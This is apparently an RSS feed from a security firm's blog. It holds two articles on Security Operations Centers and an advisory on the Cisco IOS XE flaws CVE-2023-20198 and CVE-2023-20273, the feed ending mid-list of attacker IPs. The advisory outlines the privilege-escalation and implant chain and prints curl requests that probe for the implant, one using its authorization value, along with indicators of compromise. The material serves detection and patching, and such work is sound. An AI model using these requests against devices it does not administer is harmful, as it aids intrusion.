<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Leo Duntze on Senthorus Blog</title><link>https://blog.senthorus.ch/author/leo-duntze/</link><description>Recent content in Leo Duntze on Senthorus Blog</description><generator>Hugo -- gohugo.io</generator><language>en-us</language><lastBuildDate>Thu, 13 Jun 2024 00:00:00 +0000</lastBuildDate><atom:link href="https://blog.senthorus.ch/author/leo-duntze/index.xml" rel="self" type="application/rss+xml"/><item><title>What SOC to choose</title><link>https://blog.senthorus.ch/posts/soc_to_choose/</link><pubDate>Thu, 13 Jun 2024 00:00:00 +0000</pubDate><guid>https://blog.senthorus.ch/posts/soc_to_choose/</guid><description>&lt;img src="https://blog.senthorus.ch/soc_to_choose.png" alt="Featured image of post What SOC to choose" />&lt;h2 id="introduction">Introduction
&lt;/h2>&lt;p>This article is the second part of our series “Unlocking your true Security Potential by deploying a Security Operations Center (SOC)”. In the first part we examined how a SOC enhances an organization&amp;rsquo;s security posture. Now, in this second part we will explore various deployment options for a SOC, discussing their advantages and disadvantages. Ultimately, in the last part of the series we showcase exclusively Senthorus’ capabilities, and what truly establishes it as a next generation SOC amongst its competitors.&lt;/p>
&lt;h2 id="recap-why-a-soc-helps-in-the-cyber-risk-management-process">Recap: Why a SOC helps in the Cyber Risk Management Process
&lt;/h2>&lt;p>Before we take on the different SOC types, we recapitulate: the deployment and operation of a SOC drastically improves the security posture of any organization by guaranteeing the continuity of the risk management process. Further, a SOC offers following benefits:&lt;/p>
&lt;ul>
&lt;li>Proactive Threat Detection&lt;/li>
&lt;li>Rapid Incident Response&lt;/li>
&lt;li>Enhanced Visibility&lt;/li>
&lt;li>Compliance and Regulatory Alignments&lt;/li>
&lt;li>Stakeholder Confidence&lt;/li>
&lt;/ul>
&lt;p>These key points underscore the crucial role of a SOC fortifying organizational defenses. From proactive threat detection to ensuring compliance and bolstering stakeholder confidence, a SOC stands as a cornerstone in safeguarding against evolving cyber threats, enabling businesses to navigate the digital landscape with resilience and assurance.&lt;/p>
&lt;h2 id="which-different-soc-types-exist">Which different SOC types exist
&lt;/h2>&lt;h3 id="1-in-house-soc">1. In-house SOC
&lt;/h3>&lt;p>An in-house SOC is operated internally within the organization’s premises, utilizing the organization&amp;rsquo;s own resources, staff, and infrastructure.&lt;/p>
&lt;p>&lt;strong>Advantages&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Complete control over SOC operations.&lt;/li>
&lt;li>Tailored to meet specific organizational requirements and compliance standards.&lt;/li>
&lt;li>Maximal visibility and alignment with internal security objectives.&lt;/li>
&lt;/ul>
&lt;p>&lt;strong>Disadvantages&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>High resource and workforce demands.&lt;/li>
&lt;li>Financial hurdles and recruitment challenges.&lt;/li>
&lt;li>Risk of unutilized manpower and scalability issues.&lt;/li>
&lt;/ul>
&lt;h3 id="2-managed-security-services-provider-mssp-or-managed-soc">2. Managed Security Services Provider (MSSP) or Managed SOC
&lt;/h3>&lt;p>MSSPs like Senthorus are third party providers that offer outsourced security monitoring, threat detection, incident response among other capabilities on a 24x7 basis.&lt;/p>
&lt;p>&lt;strong>Advantages&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Specialized expertise and up-to-date technologies.&lt;/li>
&lt;li>Cost-effective subscription model.&lt;/li>
&lt;li>Seamless onboarding without staff recruitment.&lt;/li>
&lt;li>High scalability and flexibility.&lt;/li>
&lt;/ul>
&lt;p>&lt;strong>Disadvantages&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Risk of over-reliance and reduced internal expertise.&lt;/li>
&lt;li>Potential coordination and communication challenges.&lt;/li>
&lt;li>Compliance concerns regarding data sovereignty.&lt;/li>
&lt;/ul>
&lt;h3 id="3-co-managed-soc">3. Co-Managed SOC
&lt;/h3>&lt;p>The organization collaborates with the MSSP to augment its internal security capabilities.&lt;/p>
&lt;p>&lt;strong>Advantages&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Combines internal SOC strengths with MSSP benefits.&lt;/li>
&lt;li>Scalable and flexible with retained control.&lt;/li>
&lt;li>Knowledge transfer from MSSP to internal team.&lt;/li>
&lt;/ul>
&lt;p>&lt;strong>Disadvantages&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Coordination and integration challenges.&lt;/li>
&lt;li>Potential conflicts between teams.&lt;/li>
&lt;li>Need for clear service definitions in the SLA.&lt;/li>
&lt;/ul>
&lt;h2 id="factors-to-consider-when-choosing-a-soc-type">Factors to consider when choosing a SOC type
&lt;/h2>&lt;h3 id="security-needs-and-requirements">Security needs and requirements
&lt;/h3>&lt;h4 id="scale-of-operations">Scale of operations
&lt;/h4>&lt;p>Define the SOC scope considering:&lt;/p>
&lt;ul>
&lt;li>Number of endpoints and geographical distribution&lt;/li>
&lt;li>Estimated data volume&lt;/li>
&lt;li>Network architecture complexity&lt;/li>
&lt;li>Existing environment&lt;/li>
&lt;li>Data storage and backup needs&lt;/li>
&lt;/ul>
&lt;h4 id="compliance-requirements">Compliance requirements
&lt;/h4>&lt;p>Regulatory frameworks like HIPAA, PCI DSS, or GDPR must be considered.&lt;/p>
&lt;p>Example: The &lt;a class="link" href="URL" >PCI DSS&lt;/a> mandates continuous logging for organizations handling cardholder data. A non-compliant SOC choice can result in fines (USD 5,000 to 100,000/month), legal issues, and reputational damage.&lt;/p>
&lt;p>MSSPs can help meet these standards quickly. In a co-managed SOC, collaboration ensures compliance within existing infrastructure.&lt;/p>
&lt;h3 id="budget-and-cost-considerations">Budget and cost considerations
&lt;/h3>&lt;h4 id="initial-investment-and-operational-costs">Initial investment and operational costs
&lt;/h4>&lt;p>&lt;strong>Internal SOC&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>High upfront investment: personnel, infrastructure, consulting, software/hardware.&lt;/li>
&lt;li>Potential hidden costs due to complexity.&lt;/li>
&lt;li>Ongoing costs: salaries, licenses, subscriptions, training, 24x7 shifts.&lt;/li>
&lt;/ul>
&lt;p>&lt;strong>MSSP&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Low initial cost due to subscription model.&lt;/li>
&lt;li>Ongoing subscription fee.&lt;/li>
&lt;li>Extra charges for special services (e.g. forensics, malware analysis).&lt;/li>
&lt;/ul>
&lt;p>&lt;strong>Co-Managed SOC&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Similar to MSSP with potential onboarding delays.&lt;/li>
&lt;li>Additional internal salaries and training.&lt;/li>
&lt;/ul>
&lt;h3 id="scalability-and-flexibility">Scalability and flexibility
&lt;/h3>&lt;h4 id="elasticity-for-seasonal-or-event-driven-demands">Elasticity for seasonal or event-driven demands
&lt;/h4>&lt;p>&lt;strong>Internal SOC&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Limited adaptability without cloud-based infrastructure.&lt;/li>
&lt;li>Difficult staff scalability due to talent shortage.&lt;/li>
&lt;li>Risk of slower incident response and operations.&lt;/li>
&lt;/ul>
&lt;p>&lt;strong>MSSP&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Better equipped for varying workloads due to shared resources.&lt;/li>
&lt;/ul>
&lt;p>&lt;strong>Co-Managed SOC&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Internal team handles alerts, MSSP supports triage and escalation.&lt;/li>
&lt;li>Shared workload with flexible focus areas.&lt;/li>
&lt;li>Recommended to define clear roles and use cloud infrastructure for agility.&lt;/li>
&lt;/ul>
&lt;h3 id="distribution-of-competences">Distribution of competences
&lt;/h3>&lt;p>&lt;strong>Internal SOC&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Full control, no external dependencies.&lt;/li>
&lt;li>Lack of external experience.&lt;/li>
&lt;/ul>
&lt;p>&lt;strong>MSSP&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Gains expertise but may cause over-dependence.&lt;/li>
&lt;li>Important to retain internal IT control.&lt;/li>
&lt;/ul>
&lt;p>&lt;strong>Co-Managed SOC&lt;/strong>:&lt;/p>
&lt;ul>
&lt;li>Balanced approach.&lt;/li>
&lt;li>Retains in-house team and benefits from MSSP expertise.&lt;/li>
&lt;/ul>
&lt;h2 id="conclusion">Conclusion
&lt;/h2>&lt;p>The choice of SOC type is critical for shaping an organization&amp;rsquo;s cybersecurity strategy. Each type has unique pros and cons. Careful consideration of the organization&amp;rsquo;s needs, infrastructure, budget, and compliance is essential.&lt;/p>
&lt;ol>
&lt;li>Assess security needs and compliance requirements. Consult experts if necessary.&lt;/li>
&lt;li>Consider budget and cost structures, especially long-term investments.&lt;/li>
&lt;li>Evaluate scalability and flexibility, especially in the context of cloud integration.&lt;/li>
&lt;li>Ensure competence distribution avoids dependencies while maintaining control.&lt;/li>
&lt;/ol>
&lt;p>Each organization is unique. With thorough evaluation and expert guidance, organizations can choose a SOC type that fortifies their security posture against evolving threats.&lt;/p></description></item><item><title>How to improve Risk Management by deploying a SOC</title><link>https://blog.senthorus.ch/posts/improve_risk_management/</link><pubDate>Wed, 08 May 2024 00:00:00 +0000</pubDate><guid>https://blog.senthorus.ch/posts/improve_risk_management/</guid><description>&lt;img src="https://blog.senthorus.ch/improve_risk_management/improve_Risk_Management_0.png" alt="Featured image of post How to improve Risk Management by deploying a SOC" />&lt;h2 id="introduction">Introduction
&lt;/h2>&lt;p>Cybersecurity is a never-ending race between attackers and defenders. As soon as a new vulnerability is disclosed, all involved parties are off to the races. While defenders look to quickly minimize the impact, attackers are keen to develop their exploits rapidly to start compromising their victims. The adversary’s acts are mostly motivated by either financial profit, political interest, or simply to gain reputation within the hacking community.&lt;/p>
&lt;p>This article marks the first part of our series: “Unlocking true security potential by deploying a Security Operations Center (SOC)”. In this series we will present a comprehensive roadmap on deploying a SOC, starting with theoretical considerations, before outlining concrete solutions. This article will show; where in the risk management process a SOC can be positioned and what benefits it offers to an organization. In the end the reader should have a clear understanding of how running a SOC helps the risk management process of any organization.&lt;/p>
&lt;h2 id="what-is-cyber-risk-management">What is Cyber Risk Management?
&lt;/h2>&lt;p>Before we can start to introduce cyber risk management, we first need to define the term ‘risk’. Risk is the combination of the probability of an event and its consequence / impact. This is commonly denoted as:&lt;/p>
&lt;p>&lt;strong>Risk = Likelihood x Impact&lt;/strong>&lt;/p>
&lt;p>Whereby, the likelihood of a cybersecurity incident is influenced by the presence of vulnerabilities within a (digital) asset and the active threat posed by potential actors seeking to exploit these vulnerabilities.&lt;/p>
&lt;p>Risk management in cybersecurity is the continuous process of identifying an organization’s digital assets and the risks posed to them, reviewing already in place security measures, implementing solutions to mitigate security risks, and ultimately monitoring residual risk.&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/improve_risk_management/improve_Risk_Management_1.jpg"
loading="lazy"
alt="Risk Management Process"
>&lt;/p>
&lt;p>&lt;em>Figure 1 Risk Management Process (source: Senthorus)&lt;/em>&lt;/p>
&lt;h3 id="step-1-risk-identification">Step 1: Risk Identification
&lt;/h3>&lt;p>Every risk management process starts with the question what assets exist in the current environment, and what risks are posed to these assets. Several methods can be used to identify all possible risks, some of them are brainstorming sessions, usage of a risk matrix, maintenance of a risk register or an extensive SWOT-analysis (SWOT standing for strength, weaknesses, opportunities, and weaknesses).&lt;/p>
&lt;h3 id="step-2-risk-analysis">Step 2: Risk Analysis
&lt;/h3>&lt;p>Once all possible risks are identified, the second step is to analyze these risks. For this purpose, two different methodologies can be used:&lt;/p>
&lt;ul>
&lt;li>&lt;strong>Qualitative risk analysis&lt;/strong>: All risks will be ranked by their occurrence probability and impact severity, based on subjective judgement.&lt;/li>
&lt;li>&lt;strong>Quantitative risk analysis&lt;/strong>: This assessment type serves to establish a financial evaluation of the risk’s impact.&lt;/li>
&lt;/ul>
&lt;blockquote>
&lt;p>Note: Assessing risks is often a very hard task. Firstly, there are many minor parameters with possible influence on the outcome. Secondly, it can be extremely difficult to translate these parameters into numerical values, for accurate calculations.&lt;/p>&lt;/blockquote>
&lt;p>The risk analysis’ goal is to know which risks must be treated with highest priority as they could endanger an organization’s core business.&lt;/p>
&lt;h3 id="step-3-risk-mitigation">Step 3: Risk Mitigation
&lt;/h3>&lt;p>The results from the previous steps are then utilized to address the identified risks according to their priority. Several mitigation options exist:&lt;/p>
&lt;ul>
&lt;li>&lt;strong>Avoidance&lt;/strong>: eliminate any exposure to a particular risk (e.g., completely avoiding public Wi-Fi-networks for company devices).&lt;/li>
&lt;li>&lt;strong>Transfer&lt;/strong>: pass the responsibility to a third party (e.g., buying cybersecurity insurance).&lt;/li>
&lt;li>&lt;strong>Reduction&lt;/strong>: mitigate the likelihood or severity of a potential risk by implementing proactive measures (e.g., deploying robust network security measures like a firewall, or a network intrusion detection system, also known as NIDS).&lt;/li>
&lt;li>&lt;strong>Acceptance&lt;/strong>: acknowledging and embracing a certain level of risk without implementing any further mitigation controls (e.g., opting to not invest in any additional security measures due to cost-benefit considerations). The remaining risk is called: Residual Risk.&lt;/li>
&lt;/ul>
&lt;h3 id="step-4-risk-monitoring">Step 4: Risk Monitoring
&lt;/h3>&lt;p>This step involves overseeing the continuous monitoring of the residual risk defined in step three (e.g., contracting, a third party to monitor the residual risk).&lt;/p>
&lt;h2 id="how-the-deployment-of-a-soc-assists-in-the-risk-management-process">How the deployment of a SOC assists in the risk management process
&lt;/h2>&lt;p>Deploying and running a SOC fortifies the risk management process not only through continuous monitoring of the residual risk, but also through the implementation of corrective controls.&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/improve_risk_management/improve_Risk_Management_2.jpg"
loading="lazy"
alt="Integration of the SOC in the Risk Management Process"
>&lt;/p>
&lt;p>&lt;em>Figure 2 Integration of the SOC in the Risk Management Process (source: Senthorus)&lt;/em>&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/improve_risk_management/improve_Risk_Management_3.jpg"
loading="lazy"
alt="Placement of the SOC within the risk management process"
>&lt;/p>
&lt;p>&lt;em>Figure 3 Placement of the SOC within the risk management process (source: Senthorus)&lt;/em>&lt;/p>
&lt;p>Figure 2 and Figure 3 are a great illustration, showing where a SOC takes its position in the Risk Management process. Especially in Figure 3, we can highlight the ensured continuity of the risk management process by the SOC operations, specifically through the SOC’s reports on possible corrective controls.&lt;/p>
&lt;p>The following points are the main objectives of a SOC:&lt;/p>
&lt;ul>
&lt;li>Address residual cyber risk.&lt;/li>
&lt;li>Help mitigating cyber risks.&lt;/li>
&lt;li>Improve the cybersecurity posture through continuous monitoring.&lt;/li>
&lt;li>Protect and defend an organization against rapid arising cyber threats.&lt;/li>
&lt;li>Strengthen the cyber-resilience of an organization.&lt;/li>
&lt;/ul>
&lt;p>Figure 4 shows the separation of capabilities between the stages of mitigation / prevention and monitoring of the residual risk by the SOC. Senthorus’ detection capabilities are highlighted in blue, showing the wide range of detection capabilities offered. The most popular techniques used by Security Engineers to prevent security incidents are highlighted in green.&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/improve_risk_management/improve_Risk_Management_4.jpg"
loading="lazy"
alt="Mitigation and Detection capabilities in comparison"
>&lt;/p>
&lt;p>&lt;em>Figure 4 Mitigation and Detection capabilities in comparison (source: &lt;a class="link" href="https://d3fend.mitre.org/" target="_blank" rel="noopener"
>MITRE Defend&lt;/a>)&lt;/em>&lt;/p>
&lt;h2 id="address-residual-risk-with-your-soc">Address residual risk with your SOC
&lt;/h2>&lt;p>Cyber risks should always be addressed first by implementing preventive controls as seen in Figure 4 highlighted in green. A SOC assists by addressing residual cyber risk, highlighted in blue in Figure 4. Optimizing the detection process is a main indicator of success for any SOC among handling alerts. This includes using Yara -, and SIGMA rules, or frameworks such as Alerting and Detection Strategy Framework (ADS) to reduce false positive alerts.&lt;/p>
&lt;p>Detections can be further improved by the integration of cyber threat intelligence feeds, allowing for a proactive detection of evolving threats. Behavioral detections will help to identify unusual activities differing from a previously defined baseline.&lt;/p>
&lt;p>Aggregation of low severity alerts into detections is a powerful way to detect advanced attacks. Some events may occur benign when considered in a small, specific scope. However, a succession of low severity events may indicate malicious behavior on an endpoint.&lt;/p>
&lt;h2 id="benefits-of-deploying-a-soc">Benefits of deploying a SOC
&lt;/h2>&lt;p>Deploying a SOC has numerous benefits. We will address the most important ones briefly:&lt;/p>
&lt;ul>
&lt;li>&lt;strong>Proactive Threat Detection&lt;/strong>: SOC teams continuously monitor network traffic, logs, and security events to detect potential threats before they can cause significant damage.&lt;/li>
&lt;li>&lt;strong>Rapid Incident Response&lt;/strong>: With dedicated personnel and sophisticated tools, a SOC can quickly act on security incidents and this on a 24x7 basis.&lt;/li>
&lt;li>&lt;strong>Enhanced Visibility&lt;/strong>: SOC activities provide comprehensive visibility into the security posture of an organization, allowing CISOs to take informed decisions to strengthen their security posture in preparation for future evolving threats.&lt;/li>
&lt;li>&lt;strong>Compliance and Regulatory Alignments&lt;/strong>: SOC operations facilitate compliance with industry regulations and cybersecurity frameworks by ensuring the implementation of corrective security controls, data protection measures, and incident response procedures.&lt;/li>
&lt;li>&lt;strong>Stakeholder Confidence&lt;/strong>: The establishment of a SOC demonstrates commitment to cybersecurity excellence driving confidence among stakeholders, customers, and partners, enhancing an organization’s reputation in the marketplace.&lt;/li>
&lt;/ul>
&lt;p>We can denote that all of the previous listed points contribute to the Continuous Improvement process of an organization.&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/improve_risk_management/improve_Risk_Management_5.jpg"
loading="lazy"
alt="Continuous Improvement Process"
>&lt;/p>
&lt;p>&lt;em>Figure 5 Continuous Improvement Process (source: &lt;a class="link" href="https://www.researchgate.net/figure/Cyber-security-continuous-improvement-process_fig2_355663964" target="_blank" rel="noopener"
>ResearchGate&lt;/a>)&lt;/em>&lt;/p>
&lt;h2 id="conclusion-is-deploying-a-soc-the-missing-puzzle-piece">Conclusion: Is deploying a SOC the missing puzzle piece?
&lt;/h2>&lt;p>In conclusion, the deployment of a Security Operations Center (SOC) represents a pivotal advancement in enhancing an organization&amp;rsquo;s cyber risk management capabilities. Particularly, CISOs tasked with safeguarding critical assets and data, may find the deployment of a SOC an elegant solution to ensure the continuous improvement of their organization’s security posture. By centralizing threat detection, incident response, and proactive monitoring within a dedicated SOC environment, CISOs can gain invaluable insights into evolving cyber threats, allowing them to take the right measures.&lt;/p>
&lt;p>With real-time threat intelligence, advanced analytics, and skilled cybersecurity professionals at their disposal, CISOs can effectively anticipate, detect, and neutralize cyber threats before they escalate, thereby fortifying an organization&amp;rsquo;s resilience against a rapidly evolving threat landscape. The SOC not only serves as a proactive defense mechanism but also empowers CISOs to make well informed decisions, allocate resources efficiently, and align their organization’s security posture with business objectives, ultimately sustaining a culture of continuous improvement, hence staying one step ahead of threat actors.&lt;/p>
&lt;p>In the second article of this series, we will take a closer look at the different deployment types of a SOC, presenting a comprehensive overview of their respective advantages and disadvantages.&lt;/p></description></item><item><title>CVE-2023-20198 &amp; CVE-2023-20273</title><link>https://blog.senthorus.ch/posts/cve_2023_20198_cve_2023_20273/</link><pubDate>Tue, 23 Apr 2024 00:00:00 +0000</pubDate><guid>https://blog.senthorus.ch/posts/cve_2023_20198_cve_2023_20273/</guid><description>&lt;img src="https://blog.senthorus.ch/CVE_2023_20198_CVE_2023_20273_0.png" alt="Featured image of post CVE-2023-20198 &amp; CVE-2023-20273" />&lt;h2 id="introduction">Introduction
&lt;/h2>&lt;p>On October 16th, 2023, Cisco disclosed a critical zero-day vulnerability regarding their WebUI feature for the IOS XE software. Cisco stated that this vulnerability was ongoingly being exploited at the time of the report, with attacks reaching back as early as September 18th, 2023. The vulnerability identified as CVE-2023-20198 received the highest CVSS score of 10.0, rating it as ‘critical’. This is mainly due to the fact that there are a lot of publicly reachable devices with this vulnerability on the internet, but also because of the consequences of successful exploitation. When executed successfully, the attacker gains level 15 privilege access to the device with just a simple web request. This allows the adversary to create a local user account with normal user access without having to provide any sort of authentication. This vulnerability affects both physical and virtual devices running Cisco’s ISO XE software that also have the HTTP or HTTPS server feature enabled.&lt;/p>
&lt;p>Four days later, on October 20th, 2023, Cisco proceeded to announce another zero-day vulnerability: CVE-2023-20273, with a CVSS score of 7.2, rating it as ‘high’. This vulnerability lies in another component of the WebUI feature, allowing the attacker to inject arbitrary commands at the system level with root privileges. Attackers would leverage CVE-2023-20273 in combination with CVE-2023-20198 to write an implant into the filesystem of the affected device.&lt;/p>
&lt;h2 id="presenting-the-attack">Presenting the attack
&lt;/h2>&lt;p>Before explaining how an attacker can successfully exploit the CVE-2023-20198 vulnerability, we first need to present the functionality of Cisco’s Web Services Management Agent (WMSA). The WMSA allows an “authenticated” user to execute commands and configure the system, e.g., by creating a local user with privilege level 15 access.&lt;/p>
&lt;p>CLI command to create a local user with privilege level 15 access:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>username &amp;lt;user&amp;gt; privilege &lt;span style="color:#ae81ff">15&lt;/span> secret &amp;lt;password&amp;gt;
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>So, in order to successfully exploit CVE-2023-20198, an adversary needs to format a special web request. This can be achieved by encoding characters in the original web request, also known as bad path parsing. Such a web request is shown in Figure 1 (image credit HORIZON3).&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_20198_CVE_2023_20273_1.jpg"
loading="lazy"
alt="Malicious web request successfully encoding: ‘webui_wsma_http’"
>&lt;/p>
&lt;p>&lt;em>Figure 1 Malicious web request successfully encoding: ‘webui_wsma_http’&lt;/em>&lt;/p>
&lt;p>Attackers then would use the created account to “legitimately” log in to the system and proceed with the exploitation of CVE-2023-20273. This exploitation is more advanced, so for deeper insights, please refer to this &lt;a class="link" href="https://blog.leakix.net/2023/10/cisco-root-privesc/" target="_blank" rel="noopener"
>blog post&lt;/a>.&lt;/p>
&lt;p>Due to a bug in the validating conditions, the only requirement for the IPv6 field is to contain three fields delimited by ‘:’. This would eventually allow an attacker to place an implant in the &lt;code>/usr/binos/conf/nginx-conf/cisco_service.conf&lt;/code> directory. Ultimately, the attacker has to restart the webserver; otherwise, the configuration changes, and thus the implant will never become active.&lt;/p>
&lt;p>Analysis of the implant showed that it is written in the LUA scripting language. It is not persistent, meaning that a reboot of the system will remove it. What remains persistent are the newly created user accounts; even after several reboots of the system they could be observed. To date, there have been two versions of the implant spotted in the wild. Causing temporary confusion. When the number of affected devices worldwide with this implant plummeted from over 50,000 to under 1,000. Shortly afterwards, the second version of the implant was discovered. This was when it became evident that in the meantime, most of the devices updated to the second version of the implant, explaining this sudden drop.&lt;/p>
&lt;h2 id="impact">Impact
&lt;/h2>&lt;p>The Common Vulnerability Scoring System (CVSS for short) rated the CVE-2023-20198 with the highest possible score of 10.0, classifying this vulnerability as ‘critical’. This is mainly due to the large number of public, vulnerable devices.&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_20198_CVE_2023_20273_2.jpg"
loading="lazy"
alt="List of vulnerable devices worldwide"
>&lt;/p>
&lt;p>&lt;em>Figure 2 List of vulnerable devices worldwide. Source Senthorus&lt;/em>&lt;/p>
&lt;p>CVE-2023-20273, allowing for a code injection, received a CVSS rating of 7.2, classifying it as ‘high’. This is due to the fact that an attacker first needs to gain control over an authenticated account for this exploitation to work. However, as shown before, the combination of CVE2023-20298 and CVE-2023-20273 allows for a very impactful attack.&lt;/p>
&lt;h2 id="defending-against-cve-2023-20198-and-cve-2023-20273">Defending against CVE-2023-20198 and CVE-2023-20273
&lt;/h2>&lt;h3 id="how-to-check-for-the-implant-on-a-device-inside-the-network">How to check for the implant on a device inside the network
&lt;/h3>&lt;p>There are multiple ways to check for the malicious implant on compromised Cisco IOS XE devices. An administrator could run the following command on the device:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>curl -k -X POST &lt;span style="color:#e6db74">&amp;#34;https://DEVICEIP/webui/logoutconfirm.html?logon_hash=1&amp;#34;&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>If the request returns a hexadecimal string, then the implant is present. However, the above command checks only for the first version of the implant. The command for checking the second version of the implant is:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>curl -k -H &lt;span style="color:#e6db74">&amp;#34;Authorization: 0ff4fbf0ecffa77ce8d3852a29263e263838e9bb&amp;#34;&lt;/span> -X POST https://DEVICEIP/webui/logoutconfirm.html?logon_hash&lt;span style="color:#f92672">=&lt;/span>&lt;span style="color:#ae81ff">1&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Another way to detect affected devices is by running this Python script, released by CERT Orange Cyberdefense.&lt;/p>
&lt;h3 id="how-to-mitigate-the-vulnerability">How to mitigate the vulnerability?
&lt;/h3>&lt;p>Cisco is currently rolling out patches for the different versions of the IOS XE software. It is recommended to check &lt;a class="link" href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z" target="_blank" rel="noopener"
>this page&lt;/a> (under the Fixed Releases tab) for which versions a patch is already available. If a patch exists, it then can be downloaded from &lt;a class="link" href="https://software.cisco.com/download/home" target="_blank" rel="noopener"
>Cisco’s official downloads page&lt;/a>.&lt;/p>
&lt;p>The following decision tree can be used to assist the process:&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_20198_CVE_2023_20273_3.jpg"
loading="lazy"
alt="Decision tree proposed by Cisco"
>&lt;/p>
&lt;p>&lt;em>Figure 3 Decision tree proposed by Cisco&lt;/em>&lt;/p>
&lt;p>The research group HORIZON3 analyzed the patch and commented: “Cisco’s method for fixing this vulnerability seems a bit unconventional. We would have expected them to fix the path parsing vulnerability instead of adding a new header. This makes us wonder if there are other hidden endpoints that can be reached with this method.” (&lt;a class="link" href="https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/" target="_blank" rel="noopener"
>Source&lt;/a>)&lt;/p>
&lt;p>Aside from patching the system as soon as possible, it is also recommended to disable the WebUI feature. This can be done by executing the following commands in the global configuration mode:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>no ip http server
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>no ip http secure-server
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Another valuable workaround is to limit access to the HTTP server to the trusted 192.168.0.0/24 network. This can be done via:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>!
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ip http access-class &lt;span style="color:#ae81ff">75&lt;/span>
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>ip http secure-server
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>!
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>access-list &lt;span style="color:#ae81ff">75&lt;/span> permit 192.168.0.0 0.0.0.255
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>access-list &lt;span style="color:#ae81ff">75&lt;/span> deny any
&lt;/span>&lt;/span>&lt;span style="display:flex;">&lt;span>!
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>To apply the access list in newer versions of Cisco IOS XE Software:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>ip http access-class ipv4 &lt;span style="color:#ae81ff">75&lt;/span>
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>Cisco points out that these workarounds work in their designated testing environment. However, clients are advised to check for applicability in their own infrastructure.&lt;/p>
&lt;h2 id="indicators-of-compromise-iocs">Indicators of Compromise (IOCs)
&lt;/h2>&lt;h3 id="system-logs">System Logs:
&lt;/h3>&lt;ul>
&lt;li>Check the system logs for suspicious usernames (&amp;lsquo;cisco_tac_admin’, or ’cisco_support’), or any other recently created user that is unknown to the network.&lt;/li>
&lt;li>Check the system logs for an installation process where the source filename is unknown or is not related to the expected action.&lt;/li>
&lt;/ul>
&lt;h3 id="snortsuricata-rules">Snort/Suricata rules:
&lt;/h3>&lt;p>Cisco recommends following Snort rule IDs for detection:&lt;/p>
&lt;ul>
&lt;li>3:50118 - alerts for initial implant injection (CVE-2023-20273)&lt;/li>
&lt;li>3:62527 - alerts for implant interaction&lt;/li>
&lt;li>3:62528 - alerts for implant interaction&lt;/li>
&lt;li>3:62529 - alerts for implant interaction&lt;/li>
&lt;li>3:62541 - alerts on attempted exploitation for initial access (CVE-2023-20198)&lt;/li>
&lt;li>3:62542 - alerts on attempted exploitation for initial access (CVE-2023-20198)&lt;/li>
&lt;/ul>
&lt;h3 id="ip-addresses">IP Addresses:
&lt;/h3>&lt;p>The following IPs are said to carry out attacks:&lt;/p>
&lt;ul>
&lt;li>5.149.249[.]74&lt;/li>
